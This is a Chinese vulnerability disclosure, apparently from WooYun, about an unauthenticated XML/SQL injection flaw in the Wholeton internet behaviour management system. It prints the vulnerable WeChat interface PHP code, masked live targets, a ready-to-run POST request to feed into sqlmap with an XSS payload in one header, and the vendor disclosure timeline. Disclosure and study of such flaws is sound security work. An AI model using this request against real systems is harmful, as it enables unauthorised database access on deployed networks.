2015-03-27: 细节已通知厂商并且等待厂商处理中 2015-03-27: 厂商已经确认,细节仅向厂商公开 2015-03-30: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息) 2015-05-21: 细节向核心白帽子及相关领域专家公开 2015-05-31: 细节向普通白帽子公开 2015-06-10: 细节向实习白帽子公开 2015-06-25: 细节向公众公开
惠尔顿上网行为管理系统XML实体注入(无需登录)
惠尔顿上网行为管理系统XML实体注入(无需登录) 官网经典案例:http://**.**.**.**/Anli.php 外网部分实际案例:
1.https://**.**.**.** 2.https://**.**.**.**/ 3.**.**.**.** 4.**.**.**.** 5.**.**.**.**/ 6.http://**.**.**.**/
这里存在一个通用的xml实体注入问题 之前有过分析:http://**.**.**.**/bugs/wooyun-2010-075009 这里也用到了那个微信的接口,导致同样的问题,不过这里没有文件读取,但是导致大量SQL注 文件:/base/wechat_interface.php
<?php /** * wechat php test */ //define your token $thisfile = basename($_SERVER['PHP_SELF']); $RootDir = $_SERVER["DOCUMENT_ROOT"].'/base'; include_once "$RootDir/include/database.php"; define("TOKEN", "wholeton"); $wechatObj = new wechatCallbackapiTest(); if (!isset($_GET["echostr"])){ $wechatObj->responseMsg(); }else{ $wechatObj->valid(); } exit; class wechatCallbackapiTest { public function valid() { $echoStr = $_GET["echostr"]; //valid signature , option if($this->checkSignature()){ echo $echoStr; } } public function responseMsg() { //get post data, May be due to the different environments $postStr = $GLOBALS["HTTP_RAW_POST_DATA"]; //extract post data if (!empty($postStr)){ //$fw = fopen("/usr/local/WholetonTM/htdocs/wx.txt", "w"); $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA); $fromUsername = $postObj->FromUserName; $toUsername = $postObj->ToUserName; $event = trim($postObj->Event); $EventKey = trim($postObj->EventKey); // $g_str .= "fromUsername: ".$fromUsername."\n"; // $g_str .= "toUsername: ".$toUsername."\n"; // $g_str .= "event: ".$event."\n"; // $g_str .= "EventKey: ".str_replace("qrscene_","",$EventKey)."\n"; //fwrite($fw, $g_str); switch ($event) { case 'subscribe': $focus = 1; $scene_id = str_replace("qrscene_","",$EventKey); break; case 'unsubscribe': $focus = 0; break; case 'SCAN': $focus = 1; $scene_id = $postObj->EventKey; break; } //fwrite($fw, "focus:".$focus."\n"); global $gblDBConnect; $sql_policy_info = "select id from tb_wechat_promote_policy where original_id='$toUsername'"; //fwrite($fw, "sql_policy_info:".$sql_policy_info."\n"); $data_policy_info= $gblDBConnect->getOne($sql_policy_info); $sql_user_obj = "select count(*) as num, id, mac_list from tb_wechat_user_obj where promote_policy_id=".$data_policy_info->id." and wechat_id='$fromUsername'"; $data_user_obj = $gblDBConnect->getOne($sql_user_obj); //fwrite($fw, "sql_user_obj:".$sql_user_obj."\n"); $sql_edit_mac = ""; if($focus==1){ $sql_mac = "select mac from tb_wechat_mac_scene where scene_id=".$scene_id; //fwrite($fw, "sql_mac:".$sql_mac."\n"); $data_mac = $gblDBConnect->getOne($sql_mac); $mac = $data_mac->mac; if ($data_user_obj->mac_list!="") { $mac_list_ary = explode(",,",$data_user_obj->mac_list); //fwrite($fw, "mac_list:".$ata_user_obj->mac_list."\n"); if (is_array($mac_list_ary)) { if (!in_array($mac, $mac_list_ary)) { //fwrite($fw, " not in_array:".$mac."\n"); $mac_list_ary[] = $mac; $mac_str = implode(",,", $mac_list_ary); $sql_edit_mac = "mac_list='$mac_str', "; } } }else { //fwrite($fw, " not = mac_list:".$mac."\n"); $sql_edit_mac = "mac_list='$mac', "; } } //fwrite($fw, "num".$data_user_obj->num."\n"); if($data_user_obj->num==0){ $sql_add = "insert into tb_wechat_user_obj(promote_policy_id, wechat_id, mac_list, focus) values($data_policy_info->id, '$fromUsername', '$mac', $focus)"; //fwrite($fw, "sql_add:".$sql_add."\n"); $gblDBConnect->execute($sql_add); }else{ $sql_edit = "update tb_wechat_user_obj set ".$sql_edit_mac."focus=$focus where id=".$data_user_obj->id; //fwrite($fw, "sql_edit:".$sql_edit."\n"); $gblDBConnect->execute($sql_edit); } exec('/usr/local/WholetonTM/triton/bin/TritonIPCTools -R'); //fwrite($fw, $g_str); //fclose($fw); }else { //$g_str .= "exit in valid()\n"; exit; } } private function receiveEvent($object){ $content = ""; switch ($object->Event) { case 'subscribe': $content = (!empty($object->EventKey))?("\n来自二维码场景 ".str_replace("qrscene_","",$object->EventKey)):""; break; case 'unsubscribe': $content = "取消关注"; break; case 'SCAN': $content = "扫描场景". $object->EventKey; break; } $fw = fopen("/usr/local/WholetonTM/htdocs/wx1.txt", "w"); fwrite($fw, ($object->Event)."\nEventKey:".($object->EventKey)."\n".$content); fclose($fw); return $content; } private function checkSignature() { $signature = $_GET["signature"]; $timestamp = $_GET["timestamp"]; $nonce = $_GET["nonce"]; $token = TOKEN; $tmpArr = array($token, $timestamp, $nonce); sort($tmpArr, SORT_STRING); $tmpStr = implode( $tmpArr ); $tmpStr = sha1( $tmpStr ); if( $tmpStr == $signature ){ return true; }else{ return false; } } } ?>
当没有$_GET["echostr"]函数时,则直接调用responseMsg,不用判断checkSignature了 然后获取:$postStr = $GLOBALS["HTTP_RAW_POST_DATA"]; 之后xml中的参数值进入sql语句 里面的4各参数:$fromUsername、$toUsername、$even、$EventKey都存在注入
保存如下请求为111.txt
POST /base/wechat_interface.php HTTP/1.1 Host: https://**.**.**.** User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml; Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Forwarded-For: <img src=1 onerror=alert(1)>**.**.**.** Connection: keep-alive Content-Type: text/xml Content-Length: 179 <?xml version="1.0" encoding="utf-8"?> <xml> <ToUserName>111111*</ToUserName> <FromUserName>222222</FromUserName> <EventKey>333333</EventKey> <Event>subscribe</Event> </xml>
然后使用sqlmap跑一下即可。
个系统可以重写了。。。
危害等级:中
漏洞Rank:9
确认时间:2015-03-27 16:44
已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报
暂无
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
@水晶 关注下 xml~
m
这个不多见。
@Ton7BrEak ok
登录后才能发表评论,请先 登录 。
